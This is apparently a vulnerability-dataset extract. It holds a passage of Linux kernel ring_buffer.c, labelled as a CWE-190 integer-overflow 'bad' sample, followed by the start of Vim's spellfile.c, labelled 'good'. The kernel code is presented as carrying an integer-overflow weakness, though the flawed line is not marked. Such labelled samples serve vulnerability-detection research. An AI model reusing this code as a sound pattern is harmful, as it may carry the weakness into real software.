* to check the integrity of the ring buffer.
* Must prevent readers from trying to read, as the check
* clears the HEAD page and readers require it.
*/
raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
rb_check_pages(cpu_buffer);
raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
atomic_dec(&cpu_buffer->record_disabled);
atomic_dec(&cpu_buffer->buffer->resize_disabled);
kfree(iter);
}
EXPORT_SYMBOL_GPL(ring_buffer_read_finish);
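/*
 * The non-consuming read protocol, end to end (a sketch;
 * process_event() is a hypothetical consumer):
 *
 *	iter = ring_buffer_read_prepare(buffer, cpu);
 *	ring_buffer_read_prepare_sync();
 *	ring_buffer_read_start(iter);
 *
 *	while ((event = ring_buffer_read(iter, &ts)))
 *		process_event(ring_buffer_event_data(event), ts);
 *
 *	ring_buffer_read_finish(iter);
 */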
/**
* ring_buffer_read - read the next item in the ring buffer by the iterator
* @iter: The ring buffer iterator
* @ts: The time stamp of the event read.
*
* This reads the next event in the ring buffer and increments the iterator.
*/
struct ring_buffer_event *
ring_buffer_read(struct ring_buffer_iter *iter, u64 *ts)
{
struct ring_buffer_event *event;
struct ring_buffer_per_cpu *cpu_buffer = iter->cpu_buffer;
unsigned long flags;
raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
again:
event = rb_iter_peek(iter, ts);
if (!event)
goto out;
if (event->type_len == RINGBUF_TYPE_PADDING)
goto again;
rb_advance_iter(iter);
out:
raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
return event;
}
EXPORT_SYMBOL_GPL(ring_buffer_read);
/**
* ring_buffer_size - return the size of the ring buffer (in bytes)
 * @buffer: The ring buffer.
 * @cpu: The CPU to get the size of.
*/
unsigned long ring_buffer_size(struct ring_buffer *buffer, int cpu)
{
/*
* Earlier, this method returned
* BUF_PAGE_SIZE * buffer->nr_pages
* Since the nr_pages field is now removed, we have converted this to
* return the per cpu buffer value.
*/
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return 0;
return BUF_PAGE_SIZE * buffer->buffers[cpu]->nr_pages;
}
EXPORT_SYMBOL_GPL(ring_buffer_size);
static void
rb_reset_cpu(struct ring_buffer_per_cpu *cpu_buffer)
{
rb_head_page_deactivate(cpu_buffer);
cpu_buffer->head_page
= list_entry(cpu_buffer->pages, struct buffer_page, list);
local_set(&cpu_buffer->head_page->write, 0);
local_set(&cpu_buffer->head_page->entries, 0);
local_set(&cpu_buffer->head_page->page->commit, 0);
cpu_buffer->head_page->read = 0;
cpu_buffer->tail_page = cpu_buffer->head_page;
cpu_buffer->commit_page = cpu_buffer->head_page;
INIT_LIST_HEAD(&cpu_buffer->reader_page->list);
INIT_LIST_HEAD(&cpu_buffer->new_pages);
local_set(&cpu_buffer->reader_page->write, 0);
local_set(&cpu_buffer->reader_page->entries, 0);
local_set(&cpu_buffer->reader_page->page->commit, 0);
cpu_buffer->reader_page->read = 0;
local_set(&cpu_buffer->entries_bytes, 0);
local_set(&cpu_buffer->overrun, 0);
local_set(&cpu_buffer->commit_overrun, 0);
local_set(&cpu_buffer->dropped_events, 0);
local_set(&cpu_buffer->entries, 0);
local_set(&cpu_buffer->committing, 0);
local_set(&cpu_buffer->commits, 0);
cpu_buffer->read = 0;
cpu_buffer->read_bytes = 0;
cpu_buffer->write_stamp = 0;
cpu_buffer->read_stamp = 0;
cpu_buffer->lost_events = 0;
cpu_buffer->last_overrun = 0;
rb_head_page_activate(cpu_buffer);
}
/**
* ring_buffer_reset_cpu - reset a ring buffer per CPU buffer
* @buffer: The ring buffer to reset a per cpu buffer of
* @cpu: The CPU buffer to be reset
*/
void ring_buffer_reset_cpu(struct ring_buffer *buffer, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer = buffer->buffers[cpu];
unsigned long flags;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return;
atomic_inc(&buffer->resize_disabled);
atomic_inc(&cpu_buffer->record_disabled);
/* Make sure all commits have finished */
synchronize_sched();
raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
if (RB_WARN_ON(cpu_buffer, local_read(&cpu_buffer->committing)))
goto out;
arch_spin_lock(&cpu_buffer->lock);
rb_reset_cpu(cpu_buffer);
arch_spin_unlock(&cpu_buffer->lock);
out:
raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
atomic_dec(&cpu_buffer->record_disabled);
atomic_dec(&buffer->resize_disabled);
}
EXPORT_SYMBOL_GPL(ring_buffer_reset_cpu);
/**
* ring_buffer_reset - reset a ring buffer
* @buffer: The ring buffer to reset all cpu buffers
*/
void ring_buffer_reset(struct ring_buffer *buffer)
{
int cpu;
for_each_buffer_cpu(buffer, cpu)
ring_buffer_reset_cpu(buffer, cpu);
}
EXPORT_SYMBOL_GPL(ring_buffer_reset);
/**
 * ring_buffer_empty - is the ring buffer empty?
* @buffer: The ring buffer to test
*/
bool ring_buffer_empty(struct ring_buffer *buffer)
{
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long flags;
bool dolock;
int cpu;
int ret;
/* yes this is racy, but if you don't like the race, lock the buffer */
for_each_buffer_cpu(buffer, cpu) {
cpu_buffer = buffer->buffers[cpu];
local_irq_save(flags);
dolock = rb_reader_lock(cpu_buffer);
ret = rb_per_cpu_empty(cpu_buffer);
rb_reader_unlock(cpu_buffer, dolock);
local_irq_restore(flags);
if (!ret)
return false;
}
return true;
}
EXPORT_SYMBOL_GPL(ring_buffer_empty);
/**
* ring_buffer_empty_cpu - is a cpu buffer of a ring buffer empty?
* @buffer: The ring buffer
* @cpu: The CPU buffer to test
*/
bool ring_buffer_empty_cpu(struct ring_buffer *buffer, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long flags;
bool dolock;
int ret;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return true;
cpu_buffer = buffer->buffers[cpu];
local_irq_save(flags);
dolock = rb_reader_lock(cpu_buffer);
ret = rb_per_cpu_empty(cpu_buffer);
rb_reader_unlock(cpu_buffer, dolock);
local_irq_restore(flags);
return ret;
}
EXPORT_SYMBOL_GPL(ring_buffer_empty_cpu);
#ifdef CONFIG_RING_BUFFER_ALLOW_SWAP
/**
* ring_buffer_swap_cpu - swap a CPU buffer between two ring buffers
 * @buffer_a: One buffer to swap with
 * @buffer_b: The other buffer to swap with
 * @cpu: The CPU of the buffers to swap
 *
 * This function is useful for tracers that want to take a "snapshot"
 * of a CPU buffer and have another backup buffer lying around.
 * It is expected that the tracer handles the cpu buffer not being
 * used at the moment.
*/
int ring_buffer_swap_cpu(struct ring_buffer *buffer_a,
struct ring_buffer *buffer_b, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer_a;
struct ring_buffer_per_cpu *cpu_buffer_b;
int ret = -EINVAL;
if (!cpumask_test_cpu(cpu, buffer_a->cpumask) ||
!cpumask_test_cpu(cpu, buffer_b->cpumask))
goto out;
cpu_buffer_a = buffer_a->buffers[cpu];
cpu_buffer_b = buffer_b->buffers[cpu];
/* At least make sure the two buffers are somewhat the same */
if (cpu_buffer_a->nr_pages != cpu_buffer_b->nr_pages)
goto out;
ret = -EAGAIN;
if (atomic_read(&buffer_a->record_disabled))
goto out;
if (atomic_read(&buffer_b->record_disabled))
goto out;
if (atomic_read(&cpu_buffer_a->record_disabled))
goto out;
if (atomic_read(&cpu_buffer_b->record_disabled))
goto out;
/*
* We can't do a synchronize_sched here because this
* function can be called in atomic context.
* Normally this will be called from the same CPU as cpu.
* If not it's up to the caller to protect this.
*/
atomic_inc(&cpu_buffer_a->record_disabled);
atomic_inc(&cpu_buffer_b->record_disabled);
ret = -EBUSY;
if (local_read(&cpu_buffer_a->committing))
goto out_dec;
if (local_read(&cpu_buffer_b->committing))
goto out_dec;
buffer_a->buffers[cpu] = cpu_buffer_b;
buffer_b->buffers[cpu] = cpu_buffer_a;
cpu_buffer_b->buffer = buffer_a;
cpu_buffer_a->buffer = buffer_b;
ret = 0;
out_dec:
atomic_dec(&cpu_buffer_a->record_disabled);
atomic_dec(&cpu_buffer_b->record_disabled);
out:
return ret;
}
EXPORT_SYMBOL_GPL(ring_buffer_swap_cpu);
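/*
 * Sketch (illustrative): snapshotting one CPU by swapping its buffer
 * into a spare ring buffer of the same size, then reading the spare
 * at leisure while the live buffer keeps recording.
 *
 *	if (ring_buffer_swap_cpu(live_buffer, snap_buffer, cpu) == 0)
 *		read snap_buffer's cpu buffer with the iterator API
 */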
#endif /* CONFIG_RING_BUFFER_ALLOW_SWAP */
/**
* ring_buffer_alloc_read_page - allocate a page to read from buffer
* @buffer: the buffer to allocate for.
* @cpu: the cpu buffer to allocate.
*
* This function is used in conjunction with ring_buffer_read_page.
* When reading a full page from the ring buffer, these functions
* can be used to speed up the process. The calling function should
* allocate a few pages first with this function. Then when it
* needs to get pages from the ring buffer, it passes the result
* of this function into ring_buffer_read_page, which will swap
* the page that was allocated, with the read page of the buffer.
*
* Returns:
* The page allocated, or NULL on error.
*/
void *ring_buffer_alloc_read_page(struct ring_buffer *buffer, int cpu)
{
struct buffer_data_page *bpage;
struct page *page;
page = alloc_pages_node(cpu_to_node(cpu),
GFP_KERNEL | __GFP_NORETRY, 0);
if (!page)
return NULL;
bpage = page_address(page);
rb_init_page(bpage);
return bpage;
}
EXPORT_SYMBOL_GPL(ring_buffer_alloc_read_page);
/**
* ring_buffer_free_read_page - free an allocated read page
 * @buffer: the buffer the page was allocated for
* @data: the page to free
*
* Free a page allocated from ring_buffer_alloc_read_page.
*/
void ring_buffer_free_read_page(struct ring_buffer *buffer, void *data)
{
free_page((unsigned long)data);
}
EXPORT_SYMBOL_GPL(ring_buffer_free_read_page);
/**
* ring_buffer_read_page - extract a page from the ring buffer
* @buffer: buffer to extract from
* @data_page: the page to use allocated from ring_buffer_alloc_read_page
* @len: amount to extract
* @cpu: the cpu of the buffer to extract
* @full: should the extraction only happen when the page is full.
*
* This function will pull out a page from the ring buffer and consume it.
* @data_page must be the address of the variable that was returned
* from ring_buffer_alloc_read_page. This is because the page might be used
* to swap with a page in the ring buffer.
*
* for example:
* rpage = ring_buffer_alloc_read_page(buffer, cpu);
* if (!rpage)
* return error;
* ret = ring_buffer_read_page(buffer, &rpage, len, cpu, 0);
* if (ret >= 0)
* process_page(rpage, ret);
*
 * When @full is set, the function will not succeed unless
* the writer is off the reader page.
*
* Note: it is up to the calling functions to handle sleeps and wakeups.
* The ring buffer can be used anywhere in the kernel and can not
* blindly call wake_up. The layer that uses the ring buffer must be
* responsible for that.
*
* Returns:
* >=0 if data has been transferred, returns the offset of consumed data.
* <0 if no data has been transferred.
*/
int ring_buffer_read_page(struct ring_buffer *buffer,
void **data_page, size_t len, int cpu, int full)
{
struct ring_buffer_per_cpu *cpu_buffer = buffer->buffers[cpu];
struct ring_buffer_event *event;
struct buffer_data_page *bpage;
struct buffer_page *reader;
unsigned long missed_events;
unsigned long flags;
unsigned int commit;
unsigned int read;
u64 save_timestamp;
int ret = -1;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
goto out;
/*
* If len is not big enough to hold the page header, then
* we can not copy anything.
*/
if (len <= BUF_PAGE_HDR_SIZE)
goto out;
len -= BUF_PAGE_HDR_SIZE;
if (!data_page)
goto out;
bpage = *data_page;
if (!bpage)
goto out;
raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
reader = rb_get_reader_page(cpu_buffer);
if (!reader)
goto out_unlock;
event = rb_reader_event(cpu_buffer);
read = reader->read;
commit = rb_page_commit(reader);
/* Check if any events were dropped */
missed_events = cpu_buffer->lost_events;
/*
* If this page has been partially read or
* if len is not big enough to read the rest of the page or
* a writer is still on the page, then
* we must copy the data from the page to the buffer.
* Otherwise, we can simply swap the page with the one passed in.
*/
if (read || (len < (commit - read)) ||
cpu_buffer->reader_page == cpu_buffer->commit_page) {
struct buffer_data_page *rpage = cpu_buffer->reader_page->page;
unsigned int rpos = read;
unsigned int pos = 0;
unsigned int size;
if (full)
goto out_unlock;
if (len > (commit - read))
len = (commit - read);
/* Always keep the time extend and data together */
size = rb_event_ts_length(event);
if (len < size)
goto out_unlock;
/* save the current timestamp, since the user will need it */
save_timestamp = cpu_buffer->read_stamp;
/* Need to copy one event at a time */
do {
/* We need the size of one event, because
* rb_advance_reader only advances by one event,
* whereas rb_event_ts_length may include the size of
* one or two events.
* We have already ensured there's enough space if this
* is a time extend. */
size = rb_event_length(event);
memcpy(bpage->data + pos, rpage->data + rpos, size);
len -= size;
rb_advance_reader(cpu_buffer);
rpos = reader->read;
pos += size;
if (rpos >= commit)
break;
event = rb_reader_event(cpu_buffer);
/* Always keep the time extend and data together */
size = rb_event_ts_length(event);
} while (len >= size);
/* update bpage */
local_set(&bpage->commit, pos);
bpage->time_stamp = save_timestamp;
/* we copied everything to the beginning */
read = 0;
} else {
/* update the entry counter */
cpu_buffer->read += rb_page_entries(reader);
cpu_buffer->read_bytes += BUF_PAGE_SIZE;
/* swap the pages */
rb_init_page(bpage);
bpage = reader->page;
reader->page = *data_page;
local_set(&reader->write, 0);
local_set(&reader->entries, 0);
reader->read = 0;
*data_page = bpage;
/*
* Use the real_end for the data size,
* This gives us a chance to store the lost events
* on the page.
*/
if (reader->real_end)
local_set(&bpage->commit, reader->real_end);
}
ret = read;
cpu_buffer->lost_events = 0;
commit = local_read(&bpage->commit);
/*
* Set a flag in the commit field if we lost events
*/
if (missed_events) {
/* If there is room at the end of the page to save the
* missed events, then record it there.
*/
if (BUF_PAGE_SIZE - commit >= sizeof(missed_events)) {
memcpy(&bpage->data[commit], &missed_events,
sizeof(missed_events));
local_add(RB_MISSED_STORED, &bpage->commit);
commit += sizeof(missed_events);
}
local_add(RB_MISSED_EVENTS, &bpage->commit);
}
/*
* This page may be off to user land. Zero it out here.
*/
if (commit < BUF_PAGE_SIZE)
memset(&bpage->data[commit], 0, BUF_PAGE_SIZE - commit);
out_unlock:
raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
out:
return ret;
}
EXPORT_SYMBOL_GPL(ring_buffer_read_page);
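/*
 * Illustrative consumer sketch, not part of the code above; process_page()
 * is a hypothetical callback.  A reader typically allocates one spare page,
 * lets ring_buffer_read_page() either copy into it or swap it with the
 * reader page, and frees whatever page it ends up holding:
 *
 *	void *rpage = ring_buffer_alloc_read_page(buffer, cpu);
 *	int ret;
 *
 *	if (!rpage)
 *		return;
 *	while ((ret = ring_buffer_read_page(buffer, &rpage,
 *					    PAGE_SIZE, cpu, 0)) >= 0)
 *		process_page(rpage, ret);
 *	ring_buffer_free_read_page(buffer, rpage);
 *
 * Note that the page is passed by address: on the swap path the caller gets
 * back a different page than the one it passed in, which is why the same
 * variable must be used for the whole loop and for the final free.
 */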
#ifdef CONFIG_HOTPLUG_CPU
static int rb_cpu_notify(struct notifier_block *self,
unsigned long action, void *hcpu)
{
struct ring_buffer *buffer =
container_of(self, struct ring_buffer, cpu_notify);
long cpu = (long)hcpu;
long nr_pages_same;
int cpu_i;
unsigned long nr_pages;
switch (action) {
case CPU_UP_PREPARE:
case CPU_UP_PREPARE_FROZEN:
if (cpumask_test_cpu(cpu, buffer->cpumask))
return NOTIFY_OK;
nr_pages = 0;
nr_pages_same = 1;
/* check if all cpu sizes are same */
for_each_buffer_cpu(buffer, cpu_i) {
/* fill in the size from first enabled cpu */
if (nr_pages == 0)
nr_pages = buffer->buffers[cpu_i]->nr_pages;
if (nr_pages != buffer->buffers[cpu_i]->nr_pages) {
nr_pages_same = 0;
break;
}
}
/* allocate minimum pages, user can later expand it */
if (!nr_pages_same)
nr_pages = 2;
buffer->buffers[cpu] =
rb_allocate_cpu_buffer(buffer, nr_pages, cpu);
if (!buffer->buffers[cpu]) {
WARN(1, "failed to allocate ring buffer on CPU %ld\n",
cpu);
return NOTIFY_OK;
}
smp_wmb();
cpumask_set_cpu(cpu, buffer->cpumask);
break;
case CPU_DOWN_PREPARE:
case CPU_DOWN_PREPARE_FROZEN:
/*
* Do nothing.
* If we were to free the buffer, then the user would
* lose any trace that was in the buffer.
*/
break;
default:
break;
}
return NOTIFY_OK;
}
#endif
#ifdef CONFIG_RING_BUFFER_STARTUP_TEST
/*
* This is a basic integrity check of the ring buffer.
* Late in the boot cycle this test will run when configured in.
* It will kick off a thread per CPU that will go into a loop
* writing to the per cpu ring buffer various sizes of data.
* Some of the data will be large items, some small.
*
* Another thread is created that goes into a spin, sending out
* IPIs to the other CPUs to also write into the ring buffer.
 * This is to test the nesting ability of the buffer.
*
* Basic stats are recorded and reported. If something in the
* ring buffer should happen that's not expected, a big warning
* is displayed and all ring buffers are disabled.
*/
static struct task_struct *rb_threads[NR_CPUS] __initdata;
struct rb_test_data {
struct ring_buffer *buffer;
unsigned long events;
unsigned long bytes_written;
unsigned long bytes_alloc;
unsigned long bytes_dropped;
unsigned long events_nested;
unsigned long bytes_written_nested;
unsigned long bytes_alloc_nested;
unsigned long bytes_dropped_nested;
int min_size_nested;
int max_size_nested;
int max_size;
int min_size;
int cpu;
int cnt;
};
static struct rb_test_data rb_data[NR_CPUS] __initdata;
/* 1 meg per cpu */
#define RB_TEST_BUFFER_SIZE 1048576
static char rb_string[] __initdata =
"abcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()?+\\"
"?+|:';\",.<>/?abcdefghijklmnopqrstuvwxyz1234567890"
"!@#$%^&*()?+\\?+|:';\",.<>/?abcdefghijklmnopqrstuv";
static bool rb_test_started __initdata;
struct rb_item {
int size;
char str[];
};
static __init int rb_write_something(struct rb_test_data *data, bool nested)
{
struct ring_buffer_event *event;
struct rb_item *item;
bool started;
int event_len;
int size;
int len;
int cnt;
/* Have nested writes different than what is written */
cnt = data->cnt + (nested ? 27 : 0);
/* Multiply cnt by ~e, to make some unique increment */
size = (cnt * 68 / 25) % (sizeof(rb_string) - 1);
len = size + sizeof(struct rb_item);
started = rb_test_started;
/* read rb_test_started before checking buffer enabled */
smp_rmb();
event = ring_buffer_lock_reserve(data->buffer, len);
if (!event) {
/* Ignore dropped events before test starts. */
if (started) {
if (nested)
data->bytes_dropped_nested += len;
else
data->bytes_dropped += len;
}
return len;
}
event_len = ring_buffer_event_length(event);
if (RB_WARN_ON(data->buffer, event_len < len))
goto out;
item = ring_buffer_event_data(event);
item->size = size;
memcpy(item->str, rb_string, size);
if (nested) {
data->bytes_alloc_nested += event_len;
data->bytes_written_nested += len;
data->events_nested++;
if (!data->min_size_nested || len < data->min_size_nested)
data->min_size_nested = len;
if (len > data->max_size_nested)
data->max_size_nested = len;
} else {
data->bytes_alloc += event_len;
data->bytes_written += len;
data->events++;
if (!data->min_size || len < data->min_size)
data->min_size = len;
if (len > data->max_size)
data->max_size = len;
}
out:
ring_buffer_unlock_commit(data->buffer, event);
return 0;
}
static __init int rb_test(void *arg)
{
struct rb_test_data *data = arg;
while (!kthread_should_stop()) {
rb_write_something(data, false);
data->cnt++;
set_current_state(TASK_INTERRUPTIBLE);
/* Now sleep between a min of 100-300us and a max of 1ms */
usleep_range(((data->cnt % 3) + 1) * 100, 1000);
}
return 0;
}
static __init void rb_ipi(void *ignore)
{
struct rb_test_data *data;
int cpu = smp_processor_id();
data = &rb_data[cpu];
rb_write_something(data, true);
}
static __init int rb_hammer_test(void *arg)
{
while (!kthread_should_stop()) {
/* Send an IPI to all cpus to write data! */
smp_call_function(rb_ipi, NULL, 1);
/* No sleep, but for non preempt, let others run */
schedule();
}
return 0;
}
static __init int test_ringbuffer(void)
{
struct task_struct *rb_hammer;
struct ring_buffer *buffer;
int cpu;
int ret = 0;
pr_info("Running ring buffer tests...\n");
buffer = ring_buffer_alloc(RB_TEST_BUFFER_SIZE, RB_FL_OVERWRITE);
if (WARN_ON(!buffer))
return 0;
/* Disable buffer so that threads can't write to it yet */
ring_buffer_record_off(buffer);
for_each_online_cpu(cpu) {
rb_data[cpu].buffer = buffer;
rb_data[cpu].cpu = cpu;
rb_data[cpu].cnt = cpu;
rb_threads[cpu] = kthread_create(rb_test, &rb_data[cpu],
"rbtester/%d", cpu);
if (WARN_ON(!rb_threads[cpu])) {
pr_cont("FAILED\n");
ret = -1;
goto out_free;
}
kthread_bind(rb_threads[cpu], cpu);
wake_up_process(rb_threads[cpu]);
}
/* Now create the rb hammer! */
rb_hammer = kthread_run(rb_hammer_test, NULL, "rbhammer");
if (WARN_ON(!rb_hammer)) {
pr_cont("FAILED\n");
ret = -1;
goto out_free;
}
ring_buffer_record_on(buffer);
/*
* Show buffer is enabled before setting rb_test_started.
* Yes there's a small race window where events could be
 * dropped and the thread won't catch it. But when a ring
* buffer gets enabled, there will always be some kind of
* delay before other CPUs see it. Thus, we don't care about
* those dropped events. We care about events dropped after
* the threads see that the buffer is active.
*/
smp_wmb();
rb_test_started = true;
set_current_state(TASK_INTERRUPTIBLE);
/* Just run for 10 seconds */
schedule_timeout(10 * HZ);
kthread_stop(rb_hammer);
out_free:
for_each_online_cpu(cpu) {
if (!rb_threads[cpu])
break;
kthread_stop(rb_threads[cpu]);
}
if (ret) {
ring_buffer_free(buffer);
return ret;
}
/* Report! */
pr_info("finished\n");
for_each_online_cpu(cpu) {
struct ring_buffer_event *event;
struct rb_test_data *data = &rb_data[cpu];
struct rb_item *item;
unsigned long total_events;
unsigned long total_dropped;
unsigned long total_written;
unsigned long total_alloc;
unsigned long total_read = 0;
unsigned long total_size = 0;
unsigned long total_len = 0;
unsigned long total_lost = 0;
unsigned long lost;
int big_event_size;
int small_event_size;
ret = -1;
total_events = data->events + data->events_nested;
total_written = data->bytes_written + data->bytes_written_nested;
total_alloc = data->bytes_alloc + data->bytes_alloc_nested;
total_dropped = data->bytes_dropped + data->bytes_dropped_nested;
big_event_size = data->max_size + data->max_size_nested;
small_event_size = data->min_size + data->min_size_nested;
pr_info("CPU %d:\n", cpu);
pr_info(" events: %ld\n", total_events);
pr_info(" dropped bytes: %ld\n", total_dropped);
pr_info(" alloced bytes: %ld\n", total_alloc);
pr_info(" written bytes: %ld\n", total_written);
pr_info(" biggest event: %d\n", big_event_size);
pr_info(" smallest event: %d\n", small_event_size);
if (RB_WARN_ON(buffer, total_dropped))
break;
ret = 0;
while ((event = ring_buffer_consume(buffer, cpu, NULL, &lost))) {
total_lost += lost;
item = ring_buffer_event_data(event);
total_len += ring_buffer_event_length(event);
total_size += item->size + sizeof(struct rb_item);
if (memcmp(&item->str[0], rb_string, item->size) != 0) {
pr_info("FAILED!\n");
pr_info("buffer had: %.*s\n", item->size, item->str);
pr_info("expected: %.*s\n", item->size, rb_string);
RB_WARN_ON(buffer, 1);
ret = -1;
break;
}
total_read++;
}
if (ret)
break;
ret = -1;
pr_info(" read events: %ld\n", total_read);
pr_info(" lost events: %ld\n", total_lost);
pr_info(" total events: %ld\n", total_lost + total_read);
pr_info(" recorded len bytes: %ld\n", total_len);
pr_info(" recorded size bytes: %ld\n", total_size);
if (total_lost)
pr_info(" With dropped events, record len and size may not match\n"
" alloced and written from above\n");
if (!total_lost) {
if (RB_WARN_ON(buffer, total_len != total_alloc ||
total_size != total_written))
break;
}
if (RB_WARN_ON(buffer, total_lost + total_read != total_events))
break;
ret = 0;
}
if (!ret)
pr_info("Ring buffer PASSED!\n");
ring_buffer_free(buffer);
return 0;
}
late_initcall(test_ringbuffer);
#endif /* CONFIG_RING_BUFFER_STARTUP_TEST */
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_5498_0 |
crossvul-cpp_data_good_3153_0 | /* vi:set ts=8 sts=4 sw=4 noet:
*
* VIM - Vi IMproved by Bram Moolenaar
*
* Do ":help uganda" in Vim to read copying and usage conditions.
* Do ":help credits" in Vim to see a list of people who contributed.
* See README.txt for an overview of the Vim source code.
*/
/*
* spellfile.c: code for reading and writing spell files.
*
* See spell.c for information about spell checking.
*/
/*
* Vim spell file format: <HEADER>
* <SECTIONS>
* <LWORDTREE>
* <KWORDTREE>
* <PREFIXTREE>
*
* <HEADER>: <fileID> <versionnr>
*
* <fileID> 8 bytes "VIMspell"
* <versionnr> 1 byte VIMSPELLVERSION
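 *		For illustration: the first nine bytes of a version 50
 *		.spl file are the ASCII characters "VIMspell" followed
 *		by the single byte 0x32 (VIMSPELLVERSION).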
*
*
* Sections make it possible to add information to the .spl file without
* making it incompatible with previous versions. There are two kinds of
* sections:
* 1. Not essential for correct spell checking. E.g. for making suggestions.
* These are skipped when not supported.
* 2. Optional information, but essential for spell checking when present.
* E.g. conditions for affixes. When this section is present but not
* supported an error message is given.
*
* <SECTIONS>: <section> ... <sectionend>
*
* <section>: <sectionID> <sectionflags> <sectionlen> (section contents)
*
* <sectionID> 1 byte number from 0 to 254 identifying the section
*
* <sectionflags> 1 byte SNF_REQUIRED: this section is required for correct
* spell checking
*
* <sectionlen> 4 bytes length of section contents, MSB first
*
* <sectionend> 1 byte SN_END
*
*
* sectionID == SN_INFO: <infotext>
* <infotext> N bytes free format text with spell file info (version,
* website, etc)
*
* sectionID == SN_REGION: <regionname> ...
* <regionname> 2 bytes Up to 8 region names: ca, au, etc. Lower case.
* First <regionname> is region 1.
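 *			    For illustration: a section holding the two
 *			    regions "ca" and "au" would be stored as the
 *			    bytes 0x00 (SN_REGION), a flags byte (0x01 when
 *			    the section is marked SNF_REQUIRED), the length
 *			    0x00 0x00 0x00 0x04 (MSB first) and the four
 *			    characters 'c' 'a' 'a' 'u'.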
*
* sectionID == SN_CHARFLAGS: <charflagslen> <charflags>
* <folcharslen> <folchars>
* <charflagslen> 1 byte Number of bytes in <charflags> (should be 128).
* <charflags> N bytes List of flags (first one is for character 128):
* 0x01 word character CF_WORD
* 0x02 upper-case character CF_UPPER
* <folcharslen> 2 bytes Number of bytes in <folchars>.
* <folchars> N bytes Folded characters, first one is for character 128.
*
* sectionID == SN_MIDWORD: <midword>
* <midword> N bytes Characters that are word characters only when used
* in the middle of a word.
*
* sectionID == SN_PREFCOND: <prefcondcnt> <prefcond> ...
* <prefcondcnt> 2 bytes Number of <prefcond> items following.
* <prefcond> : <condlen> <condstr>
* <condlen> 1 byte Length of <condstr>.
* <condstr> N bytes Condition for the prefix.
*
* sectionID == SN_REP: <repcount> <rep> ...
* <repcount> 2 bytes number of <rep> items, MSB first.
* <rep> : <repfromlen> <repfrom> <reptolen> <repto>
* <repfromlen> 1 byte length of <repfrom>
* <repfrom> N bytes "from" part of replacement
* <reptolen> 1 byte length of <repto>
* <repto> N bytes "to" part of replacement
*
* sectionID == SN_REPSAL: <repcount> <rep> ...
* just like SN_REP but for soundfolded words
*
* sectionID == SN_SAL: <salflags> <salcount> <sal> ...
* <salflags> 1 byte flags for soundsalike conversion:
* SAL_F0LLOWUP
* SAL_COLLAPSE
* SAL_REM_ACCENTS
* <salcount> 2 bytes number of <sal> items following
* <sal> : <salfromlen> <salfrom> <saltolen> <salto>
* <salfromlen> 1 byte length of <salfrom>
* <salfrom> N bytes "from" part of soundsalike
* <saltolen> 1 byte length of <salto>
* <salto> N bytes "to" part of soundsalike
*
* sectionID == SN_SOFO: <sofofromlen> <sofofrom> <sofotolen> <sofoto>
* <sofofromlen> 2 bytes length of <sofofrom>
* <sofofrom> N bytes "from" part of soundfold
* <sofotolen> 2 bytes length of <sofoto>
* <sofoto> N bytes "to" part of soundfold
*
* sectionID == SN_SUGFILE: <timestamp>
* <timestamp> 8 bytes time in seconds that must match with .sug file
*
* sectionID == SN_NOSPLITSUGS: nothing
*
* sectionID == SN_NOCOMPOUNDSUGS: nothing
*
* sectionID == SN_WORDS: <word> ...
* <word> N bytes NUL terminated common word
*
* sectionID == SN_MAP: <mapstr>
* <mapstr> N bytes String with sequences of similar characters,
* separated by slashes.
*
* sectionID == SN_COMPOUND: <compmax> <compminlen> <compsylmax> <compoptions>
* <comppatcount> <comppattern> ... <compflags>
* <compmax> 1 byte Maximum nr of words in compound word.
* <compminlen> 1 byte Minimal word length for compounding.
* <compsylmax> 1 byte Maximum nr of syllables in compound word.
* <compoptions> 2 bytes COMP_ flags.
* <comppatcount> 2 bytes number of <comppattern> following
* <compflags> N bytes Flags from COMPOUNDRULE items, separated by
* slashes.
*
* <comppattern>: <comppatlen> <comppattext>
* <comppatlen> 1 byte length of <comppattext>
* <comppattext> N bytes end or begin chars from CHECKCOMPOUNDPATTERN
*
* sectionID == SN_NOBREAK: (empty, its presence is what matters)
*
* sectionID == SN_SYLLABLE: <syllable>
* <syllable> N bytes String from SYLLABLE item.
*
* <LWORDTREE>: <wordtree>
*
* <KWORDTREE>: <wordtree>
*
* <PREFIXTREE>: <wordtree>
*
*
* <wordtree>: <nodecount> <nodedata> ...
*
* <nodecount> 4 bytes Number of nodes following. MSB first.
*
* <nodedata>: <siblingcount> <sibling> ...
*
* <siblingcount> 1 byte Number of siblings in this node. The siblings
* follow in sorted order.
*
* <sibling>: <byte> [ <nodeidx> <xbyte>
* | <flags> [<flags2>] [<region>] [<affixID>]
* | [<pflags>] <affixID> <prefcondnr> ]
*
* <byte> 1 byte Byte value of the sibling. Special cases:
* BY_NOFLAGS: End of word without flags and for all
* regions.
* For PREFIXTREE <affixID> and
* <prefcondnr> follow.
* BY_FLAGS: End of word, <flags> follow.
* For PREFIXTREE <pflags>, <affixID>
* and <prefcondnr> follow.
* BY_FLAGS2: End of word, <flags> and <flags2>
* follow. Not used in PREFIXTREE.
* BY_INDEX: Child of sibling is shared, <nodeidx>
* and <xbyte> follow.
*
* <nodeidx> 3 bytes Index of child for this sibling, MSB first.
*
* <xbyte> 1 byte byte value of the sibling.
*
* <flags> 1 byte bitmask of:
* WF_ALLCAP word must have only capitals
* WF_ONECAP first char of word must be capital
* WF_KEEPCAP keep-case word
* WF_FIXCAP keep-case word, all caps not allowed
* WF_RARE rare word
* WF_BANNED bad word
* WF_REGION <region> follows
* WF_AFX <affixID> follows
*
* <flags2> 1 byte Bitmask of:
* WF_HAS_AFF >> 8 word includes affix
